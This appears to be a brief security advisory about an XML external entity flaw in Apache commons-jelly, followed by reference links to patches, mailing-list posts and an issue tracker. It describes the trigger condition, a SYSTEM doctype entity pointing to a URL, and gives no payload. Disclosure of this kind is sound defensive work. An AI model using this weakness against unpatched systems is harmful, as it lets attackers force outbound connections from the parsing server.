Apache commons-jelly is vulnerable to XML external entity (XXE). When jelly XML files are parsed with a custom doctype
declared as a SYSTEM
entity with a URL at the beginning of the file, the parser will connect to the URL at instantiation.
commons.apache.org/proper/commons-jelly/security-reports.html
seclists.org/oss-sec/2017/q3/554
www.securityfocus.com/bid/101052
www.securitytracker.com/id/1039444
github.com/apache/commons-jelly/commit/e3ec3356ed733f25b2840542b29d77aff6cd5c7b
github.com/apache/commons-jelly/commit/ed885dee7d315dcab3e18c17a0ba9823bcce7968
issues.apache.org/jira/browse/JELLY-293
lists.apache.org/thread.html/f1fc3f2c45264af44ce782d54b5908ac95f02bf7ad88bb57bfb04b73@%3Cdev.commons.apache.org%3E
www.blackhat.com/us-17/speakers/Luca-Carettoni.html